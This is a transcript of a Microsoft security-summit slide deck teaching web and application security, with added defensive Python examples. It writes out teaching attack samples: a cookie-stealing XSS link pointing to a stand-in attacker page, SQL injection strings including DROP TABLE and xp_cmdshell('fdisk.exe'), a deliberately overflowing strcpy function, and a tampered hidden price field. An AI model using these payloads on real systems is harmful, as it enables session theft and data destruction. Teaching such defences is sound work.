Microsoft Australia Security Summit
Managing Risk: Application Development Principles and Best Practices
Dave Glover, Microsoft Pty Ltd, http://blogs.msdn.com/dglover

Dec 22, 2015

Transcript
Page 1:

Microsoft Australia Security Summit

Managing Risk: Application Development Principles and Best Practices

Dave Glover, Microsoft Pty Ltd, http://blogs.msdn.com/dglover

Page 2:

The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."

Page 3:

Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally

Page 4: Agenda (repeat of Page 3)

Page 5:

Buffer Overruns

Occurs when data exceeds the expected size and overwrites other values

Exists primarily in unmanaged C/C++ code

Includes four types:
- Stack-based
- Heap overruns
- V-table and function pointer overwrites
- Exception handler overwrites

Can be exploited by worms and can result in:
- Access Violation (Denial of Service)
- Instability
- Code Injection

Page 6:

How Stack-Based Buffer Overruns Work

#include <string.h>

/* Deliberately flawed: strcpy copies until the terminating NUL with no
   regard for the 10-byte destination, so a longer input overwrites
   whatever sits after buffer on the stack (saved registers, return address). */
void flawed(char *str) {
    char buffer[10];
    strcpy(buffer, str);
}

int main(void) {
    flawed("This string is too long");
    return 0;
}

Page 7:

Defending Against Buffer Overruns

Deprecated and should be avoided: strcpy, strncpy, CopyMemory, MultiByteToWideChar, …

- Use strsafe.h for safer buffer handling
- Use the /GS compile option in Visual C++ .NET
- Check all array indexes
- Use recognized file-path processing methods, such as splitpath (C runtime)
- Use managed code, but pay attention to PInvoke and COM Interop

Page 8: Agenda (repeat of Page 3)

Page 9:

Arithmetic Errors

Occur when the limitations of a variable are exceeded

Lead to serious runtime issues

Are often overlooked and underestimated

Include:
- Overflow – value too large for data type
- Underflow – value too small for data type

Page 10:

Arithmetic Overflow
- CalEngine
- Purchase.aspx
- GoodPurchase.aspx

Page 11:

Defending Against Arithmetic Errors

Understand the Limitations

Unit Test Boundary Conditions

Consider limitations of data types

Consider writing safe, reusable functions

Consider using a safe template class (if coding in C++)

Use Languages that support overflow checking – VB.NET and C# !!
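The overflow behind the Purchase.aspx demo, as an added Python example that is not code from the deck or its demo applications: .NET integers are fixed width, so an unchecked multiply wraps silently, while Python integers are unbounded, so the wrap is simulated with a 32-bit mask and the checked version raises the way C#'s `checked` context (or VB.NET's default overflow checking) would. The function names, quantities and prices are constructed here.

```python
"""Fixed-width arithmetic: silent wraparound versus overflow checking.

Added example, not code from the deck. Quantities and prices are constructed.
"""
from typing import Optional

INT32_MIN = -(2 ** 31)
INT32_MAX = 2 ** 31 - 1


def wrap_int32(value: int) -> int:
    """Reduce an arbitrary integer to what a 32-bit two's-complement int
    would hold, i.e. the result C# produces in an *unchecked* context."""
    value &= 0xFFFFFFFF
    return value - 2 ** 32 if value > INT32_MAX else value


def checked_mul_int32(a: int, b: int) -> int:
    """Multiply and raise if the exact result does not fit in int32,
    mirroring C# `checked(a * b)`."""
    result = a * b
    if result < INT32_MIN or result > INT32_MAX:
        raise OverflowError(f"{a} * {b} = {result} does not fit in int32")
    return result


def unchecked_total_cents(quantity: int, unit_price_cents: int) -> int:
    """The buggy purchase-total computation: the product wraps and the
    caller sees a small, or even negative, amount."""
    return wrap_int32(quantity * unit_price_cents)


def checked_total_cents(quantity: int, unit_price_cents: int) -> int:
    """Defensive version: validate the inputs (positive quantity, non-negative
    price) and refuse to produce a total that overflowed."""
    if quantity <= 0:
        raise ValueError("quantity must be positive")
    if unit_price_cents < 0:
        raise ValueError("unit price must not be negative")
    return checked_mul_int32(quantity, unit_price_cents)


def safe_total_cents(quantity: int, unit_price_cents: int) -> Optional[int]:
    """Convenience wrapper for callers that want to reject the order
    (None) rather than handle the exception themselves."""
    try:
        return checked_total_cents(quantity, unit_price_cents)
    except (OverflowError, ValueError):
        return None


if __name__ == "__main__":
    # 2,147,483,647 items at 2 cents: the true total is 4,294,967,294 cents,
    # which wraps to -2 in int32, so the customer would be *credited*.
    print("unchecked:", unchecked_total_cents(INT32_MAX, 2))   # -2
    print("checked:  ", safe_total_cents(INT32_MAX, 2))        # None
    print("normal:   ", safe_total_cents(3, 1999))             # 5997
```

The boundary cases the slide asks you to unit test are exactly the values near `INT32_MAX` and the negative quantity: both are what the checked path rejects.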

Page 12: Agenda (repeat of Page 3)

Page 13:

Cross-Site Scripting

Malicious script is sent to a Web application as input.

Echoed back to a user's browser, where it is executed

Targets your users; your application is the vehicle

Attacks are via carefully crafted hyperlinks

Allows hackers to:
- Execute malicious script in a client's Web browser
- Insert <script>, <object>, <applet>, <form>, and <embed> tags
- Steal Web session information and cookies (including authentication)
- Access the client computer resources

Page 14:

How Cross-Site Scripting Works

<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>

Query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by Search.aspx in a query string

URL points to the site that the hacker wants to attack

Page 15:

What Is a One-Click Attack

Site offers persistent sign-in option (cookies)

Victim user navigates to (or opens) an HTML page – perhaps a "once in a lifetime offer"

One or more actions are carried out using the trust of the victim user, who is completely unsuspecting

Page 16:

Cross Site Script Attacks
- Search.aspx
- Review.aspx
- AntiXSS Library
- Secure Controls
- GoodSearch.aspx
- Validation Controls
- Secure Frames
- One Click Attack

Page 17:

Defending Against Cross-Site Scripting Attacks

Do not:
- Trust user input
- Echo client-supplied data without encoding
- Store secret information in cookies

Do:
- Take advantage of ASP.NET's validateRequest
- Take advantage of ASP.NET's ViewStateUserKey
- Consider AntiXSS for data encoding
- Use the HttpOnly cookie option
- Use the <frame> security attribute
- Implement Secure Custom Controls

Page 18:

Defending Against XSS

Input validation – first line of defense

Output encoding:
- Platform features: Server.HtmlEncode() – OK: principle of exclusions, or black-listing
- Use Anti-XSS – better: principle of inclusions, or white-listing

Context: Non-persistent XSS. The product search feature of WIDGETCO displays the 'searchstring' input without sanitizing or encoding:

Bad code:

someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS:

someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";
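The WIDGETCO search label above, as an added Python example that is not code from the deck or the AntiXSS library: the same "Results for …" fragment is rendered by raw concatenation, by an exclusion-list encoder in the style of Server.HtmlEncode, and by an inclusion-list encoder that, like the deck describes AntiXSS, passes only a white-list of characters through unchanged and numerically encodes everything else. The payload is the deck's own attack string; `encode_html`, `render_*` and `contains_markup` are names chosen here.

```python
"""Output encoding for reflected XSS: exclusion-list vs inclusion-list encoders.

Added example, not code from the deck. PAYLOAD is the slide's search string;
function names are chosen here.
"""
import html
import re

# Characters always safe to emit into HTML text or a quoted attribute.
# Everything outside this set is encoded (inclusion principle), instead of
# encoding only a known-bad list.
_SAFE = re.compile(r"[A-Za-z0-9 ,.\-_]")


def encode_html(text: str) -> str:
    """White-list encoder: keep alphanumerics and a few punctuation marks,
    numerically encode every other code point (quotes, < > &, parentheses,
    control characters, ...)."""
    return "".join(ch if _SAFE.fullmatch(ch) else f"&#{ord(ch)};" for ch in text)


def render_unsafe(searchstring: str) -> str:
    """The slide's bad code: the raw input lands in the page."""
    return "Results for " + searchstring + ":"


def render_htmlencode(searchstring: str) -> str:
    """Server.HtmlEncode-style exclusion list: only & < > \" ' are changed."""
    return "Results for " + html.escape(searchstring, quote=True) + ":"


def render_encoded(searchstring: str) -> str:
    """The slide's mitigation, with the white-list encoder standing in for
    AntiXSS.EncodeHtml."""
    return "Results for " + encode_html(searchstring) + ":"


def contains_markup(fragment: str) -> bool:
    """Crude check used only to show the effect: is a raw tag still present?"""
    return re.search(r"<\s*/?\s*[a-zA-Z]", fragment) is not None


# The deck's payload (Page 14), used as constructed input.
PAYLOAD = ("<script language='javascript'>document.location.replace("
           "'http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>")

if __name__ == "__main__":
    for name, fn in [("unsafe", render_unsafe),
                     ("HtmlEncode", render_htmlencode),
                     ("white-list", render_encoded)]:
        out = fn(PAYLOAD)
        print(f"{name:10} raw tag survives: {contains_markup(out)}")
        print("   ", out[:80])
```

Both encoders neutralise this particular payload; the difference is what happens with characters the exclusion list does not know about, which is why the deck rates the inclusion approach "better". Neither replaces input validation, which the slide lists as the first line of defense.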

Page 19:

Defending Against One-Click Attack

Browser's cross-frame security limits this to a "write-only" attack

Concept for defense: require a data element in the request which the attacker can't supply

Check Referrer field

In .NET 1.1 use ViewStateUserKey:

override protected void OnInit(EventArgs e)
{
    // ...
    ViewStateUserKey = User.Identity.Name;
    // ...
}
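The "data element the attacker can't supply" idea, as an added Python example that is not code from the deck: a per-user anti-forgery token derived from a server secret and the authenticated user name (the same binding that setting ViewStateUserKey to User.Identity.Name gives ViewState), combined with the Referrer check the slide lists. SERVER_SECRET, the user names, the header and form dictionaries, and the function names are all constructed here.

```python
"""Anti-forgery token bound to the signed-in user, plus a Referrer check.

Added example, not code from the deck. SERVER_SECRET, user names and the
request dictionaries are constructed for the demonstration.
"""
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlparse

# In a real deployment this lives in protected configuration, not in source.
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(user_name: str, secret: bytes = SERVER_SECRET) -> str:
    """Token the page embeds in its own form. It is an HMAC over the user's
    identity, so a page crafted elsewhere cannot contain it: its author does
    not hold the secret, and the victim's browser never reveals the token."""
    return hmac.new(secret, user_name.encode("utf-8"), hashlib.sha256).hexdigest()


def token_valid(user_name: str, submitted: Optional[str],
                secret: bytes = SERVER_SECRET) -> bool:
    """Recompute for the *authenticated* user and compare in constant time."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_token(user_name, secret), submitted)


def referrer_ok(headers: dict, expected_host: str) -> bool:
    """The slide's Referrer check: accept only postbacks whose Referer names
    our own host. A missing header counts as a failure here; allowing it
    weakens the check, so that choice should be deliberate."""
    ref = headers.get("Referer")
    if not ref:
        return False
    return urlparse(ref).hostname == expected_host


def accept_postback(user_name: str, headers: dict, form: dict,
                    expected_host: str) -> bool:
    """Both defenses must pass before the state-changing action runs."""
    return (referrer_ok(headers, expected_host)
            and token_valid(user_name, form.get("__token")))


if __name__ == "__main__":
    # Legitimate postback from our own page.
    good = accept_postback("alice",
                           {"Referer": "https://shop.example/Purchase.aspx"},
                           {"__token": issue_token("alice"), "qty": "1"},
                           "shop.example")
    # Forged request: the other site's page cannot know alice's token, and
    # the browser reports that site as the Referer.
    forged = accept_postback("alice",
                             {"Referer": "https://offer.example/once-in-a-lifetime.html"},
                             {"qty": "100"},
                             "shop.example")
    print("legitimate accepted:", good, "| forged accepted:", forged)
```

The token check is the one that carries the weight; the Referrer check is cheap and worth logging on, but browsers and proxies do strip the header, which is why it is listed as a supplementary measure.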

Page 20: Agenda (repeat of Page 3)

Page 21:

SQL Injection

Adds SQL statements to user input to:
- Probe databases, execute multiple SQL statements
- Bypass authorization
- Call built-in stored procedures

Exploits applications that don't validate input

Input from <form> fields, query strings, cookies

Page 22:

How SQL Injection Works

Model Query:

SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'

Malicious Query:

SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1 -- AND Password=''

"or 1=1" matches every record in the table

"--" comments out the remainder of the query

Page 23:

Examples Of SQL Injection

If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following:

ALFKI1001

ALFKI1001' or 1=1 --

ALFKI1001'; DROP TABLE OrderDetail --

ALFKI1001'; exec xp_cmdshell('fdisk.exe') --

The vulnerable dynamic SQL (C#) that makes this possible:

sqlString = String.Format("select count (*) from customers where username='{0}' and password='{1}'", userName, password);

Page 24:

SQL Injection Attack
- Login Attack
- Search Page Attack
- SQL Cmd Shell Attack

Page 25:

Defending Against SQL Injection

Code against SQL Injection Attacks:
- Sanitize all input
- Don't use Dynamic SQL commands
- Use Secured Stored Procedures or Parameterized Commands

Run with least privilege:
- Never execute as "sa"
- Restrict access to built-in stored procedures

Store connection strings securely:
- Integrated Security is better
- Encrypt the Web.Config connections section (DPAPI or Configuration Application Block)

Do not echo database errors (fail intelligently)

Apply administrative protections to SQL Server

http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
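The login query from Pages 22 and 23, as an added Python example that is not code from the deck: the String.Format pattern is reproduced with Python string formatting against an in-memory SQLite stand-in for the Users table, beside the parameterized command the slide recommends. The table contents are constructed (the slide's Jeff/imbatman row plus one more); the login inputs are the slide's own `' or 1=1--` payload; function names are chosen here.

```python
"""Dynamic SQL versus a parameterized command, run against a stand-in for the
deck's Users table. Added example, not code from the deck; table rows and
login inputs are constructed from the slides.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the Users table the slide queries. Passwords
    are stored in clear only so the slide's query can be used unchanged."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("Jeff", "imbatman"), ("Dave", "s3cret")])
    return conn


def login_dynamic(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """The String.Format pattern from Page 23: input becomes SQL text. A quote
    in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='%s' AND Password='%s'"
           % (user_name, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Parameterized command: the statement shape is fixed before the values
    are bound, so the input can only ever be compared as a string."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (user_name, password)).fetchone()[0] > 0


def looks_like_injection(value: str) -> bool:
    """Heuristic for logging and alerting only, never a substitute for
    parameterization: flags a quote together with a comment marker, a
    statement separator or an OR, the shapes the slides show."""
    v = value.lower()
    return "'" in v and ("--" in v or ";" in v or " or " in v)


if __name__ == "__main__":
    db = make_db()
    payload_user, payload_pass = "' or 1=1--", ""
    print("dynamic SQL lets the payload in:", login_dynamic(db, payload_user, payload_pass))
    print("parameterized rejects it:      ", login_parameterized(db, payload_user, payload_pass))
    print("real credentials still work:   ", login_parameterized(db, "Jeff", "imbatman"))
    print("flag for the SOC:              ", looks_like_injection(payload_user))
```

The dynamic version returns true for the payload because the comment marker removes the password clause entirely, just as the slide's "Malicious Query" shows. The least-privilege points on the slide (never run as "sa", restrict built-in stored procedures) limit the damage when parameterization is missed somewhere; they do not make dynamic SQL safe.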

Page 26: Agenda (repeat of Page 3)

Page 27:

Cryptography Weaknesses

Inappropriate use of algorithms:
- Creating your own
- Using weak ones
- Incorrect application

Failure to keep keys secure:
- Insecure storage
- Extensive duration of use

The human factor:
- Accidental release of private keys

Key

Plaintext

Ciphertext

Algorithm

"I need three of the above to decrypt your data!"

Page 28:

Defending Against Cryptography Weaknesses

Recycle keys periodically

Use ACLs to restrict access to keys

Store keys on an external device

Use larger keys to provide increased security

Use DPAPI to simplify key management, if possible

Do not implement your own cryptographic routines

Page 29: Agenda (repeat of Page 3)

Page 30:

Hidden-Field Tampering

Exploits applications that persist data between requests by round-tripping it in hidden <input> fields

The technique:
- Look for <input type="hidden" … > tags
- Submit bogus requests with modified value attributes to spoof a Web server

Page 31:

How Hidden-Field Tampering Works

Page contains this…

<input type="hidden" id="price" value="10000.00">

Postback data should contain this… price="10000.00"

Instead it contains this… price="1.00"
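How a postback handler can cope with the price field above, as an added Python example that is not code from the deck: the first defence ignores the round-tripped value and looks the price up again from the server-side catalogue; the second seals the field with a MAC so an edited value is detected (the same idea ASP.NET applies to ViewState), and then still cross-checks it against the catalogue. The catalogue, signing key, form dictionaries and function names are constructed here.

```python
"""Handling a round-tripped hidden field on postback.

Added example, not code from the deck. CATALOGUE, SIGNING_KEY, the form
posts and the function names are constructed.
"""
import hashlib
import hmac
from decimal import Decimal
from typing import Optional

CATALOGUE = {"sku-1001": Decimal("10000.00")}     # authoritative prices
SIGNING_KEY = b"constructed-demo-key-keep-in-protected-config"


# Defence 1: do not trust the field at all; look the price up again.
def price_from_catalogue(form: dict) -> Optional[Decimal]:
    """Use the posted sku only as a key; any price the client sent is ignored."""
    return CATALOGUE.get(form.get("sku"))


# Defence 2: if a value must round-trip, seal it so edits are detectable.
def seal(value: str, key: bytes = SIGNING_KEY) -> str:
    """Hidden-field content: the value plus a MAC over it."""
    mac = hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def unseal(field: str, key: bytes = SIGNING_KEY) -> Optional[str]:
    """Return the value only if the MAC verifies; None signals tampering
    (or a field the client rewrote without the separator and MAC)."""
    value, sep, mac = field.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(expected, mac) else None


def charge_amount(form: dict) -> Optional[Decimal]:
    """Postback handler: accept the sealed field only when intact, and even
    then cross-check it against the catalogue so a stale but validly signed
    price cannot be replayed after a price change."""
    posted = unseal(form.get("price", ""))
    if posted is None:
        return None                      # tampered or missing: reject
    current = price_from_catalogue(form)
    # `posted` verified, so it is a value this server sealed and Decimal() parses it.
    if current is None or Decimal(posted) != current:
        return None                      # price changed since the page was served
    return current


if __name__ == "__main__":
    served = {"sku": "sku-1001", "price": seal("10000.00")}
    print("honest postback :", charge_amount(served))            # 10000.00
    edited = dict(served, price="1.00")                          # value changed, MAC gone
    print("edited field    :", charge_amount(edited))            # None
    guessed = dict(served, price="1.00|" + "0" * 64)             # wrong MAC
    print("forged MAC      :", charge_amount(guessed))           # None
```

Defence 1 alone is the simplest fix for a price: the server already knows it, so there is no reason to round-trip it. Sealing is for data that genuinely has to travel with the page, and it protects integrity only; a sealed value is still readable by the client.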

Page 32: Agenda (repeat of Page 3)

Page 33:

Canonicalization Issues

There is usually more than one way to name something

Alternate representations exist for:
- File names
- URLs
- Devices (such as printers)

Hackers may exploit code that makes decisions based on file names or URLs

Page 34:

Canonicalization Issues – Example 1: File Names

1. MyLongFile.txt
2. MyLongFile.txt.
3. MyLong~1.txt
4. MyLongFile.txt::$DATA

Page 35:

Defending Against Canonicalization Issues

Use file-system security to restrict access to private data

Never make a decision based on a name

Disable the IIS Parent Paths setting

Encrypt Web.Config Sections
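The rule "never make a decision based on a name", as an added Python example that is not code from the deck: a user-supplied file name (the ViewImage.aspx scenario in the next demo slide) is resolved against the web root first and the decision is made on the canonical result, while the alternate spellings from the file-name slide (trailing dot, 8.3 short name, `::$DATA` stream) are refused outright instead of being compared. WEB_ROOT, the request names and the function names are constructed here; `posixpath` is used so the behaviour is the same on any platform.

```python
"""Canonicalize before you decide: resolving a user-supplied file name
against a web root. Added example, not code from the deck; WEB_ROOT and the
request names are constructed.
"""
import posixpath
import re
from typing import Optional

WEB_ROOT = "/var/www/images"

# Spellings that can name the same NTFS file as the plain name (Page 34):
# a trailing dot or space, an 8.3 short name, an alternate data stream.
_TRAILING_DOT_OR_SPACE = re.compile(r"[. ]$")
_SHORT_NAME = re.compile(r"~\d+(\.|$)")
_DATA_STREAM = re.compile(r"::")


def suspicious_spelling(name: str) -> bool:
    """True if any path segment uses one of the alternate forms (or a NUL).
    This is only a pre-filter; the real decision is made on the canonical
    path in safe_join, never on the name itself."""
    for segment in name.split("/"):
        if segment in (".", ".."):       # handled by normpath below
            continue
        if (_TRAILING_DOT_OR_SPACE.search(segment) or _SHORT_NAME.search(segment)
                or _DATA_STREAM.search(segment) or "\x00" in segment):
            return True
    return False


def safe_join(root: str, requested: str) -> Optional[str]:
    """Return the canonical absolute path if it lies strictly inside root,
    else None.

    Steps: reject alternate spellings, normalise root, join, normalise the
    result (collapsing . and ..), then require a prefix of root plus a
    separator so '/var/www/images-private' cannot pass as inside root.
    """
    if suspicious_spelling(requested):
        return None
    root = posixpath.normpath(root)
    # posixpath.join discards root when `requested` is absolute; the
    # containment check after normalisation is what catches that.
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for name in ["logo.gif", "sub/../logo.gif", "../Web.config", "/etc/passwd",
                 "MyLong~1.txt", "MyLongFile.txt::$DATA", "MyLongFile.txt."]:
        print(f"{name!r:28} -> {safe_join(WEB_ROOT, name)}")
```

On a real file system the same containment check should be applied to `os.path.realpath` of the candidate as well, so a symbolic link inside the root cannot point outside it; the slide's first bullet (file-system security on the private data) is the backstop when the application-level check is wrong.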

Page 36:

Encrypting Web.config sections

aspnet_regiis -pc "SampleKeys" -exp
aspnet_regiis -pa "SampleKeys" "domain\acct"
aspnet_regiis -pef connectionStrings .
aspnet_regiis -pdf connectionStrings .

Web.config:

<configProtectedData defaultProvider="SampleProvider">
  <providers>
    <add name="SampleProvider"
         type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
         keyContainerName="SampleKeys"
         useMachineContainer="true" />
  </providers>
</configProtectedData>

Page 37:

Traversal Attacks
- PathTraversal.htm
- ViewImage.aspx
- GoodProducts.aspx
- Web.Config Encryption

Page 38:

Next Steps

Stay informed about security:
- Microsoft Developers Network Security Center: http://msdn.microsoft.com/security/
- Microsoft Security Guidance: http://www.microsoft.com/security/guidance/

Get additional security training – find online and in-person training seminars: http://www.microsoft.com/seminar/events/security/

Read the book: Writing Secure Code, Michael Howard and David LeBlanc, ISBN: 0-7356-1722-8

Page 39:

Defending Against the Others

Improving Web Application Security: Threats and Countermeasures

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp

Page 40:

Security seminar follow up…

Security e-forum site: www.microsoft.com.au/eforum
- View on-demand web casts of all presentations from this event (tell your work colleagues!)
- Online live chats: have a live chat with the Microsoft security experts you'll see today. Check the e-forum site for the Live Chat schedule.
- Plus lots more…

Evaluation forms – we value your feedback!
- Need help with your business' security? Q7 – register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your security challenges
- Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360

Page 41: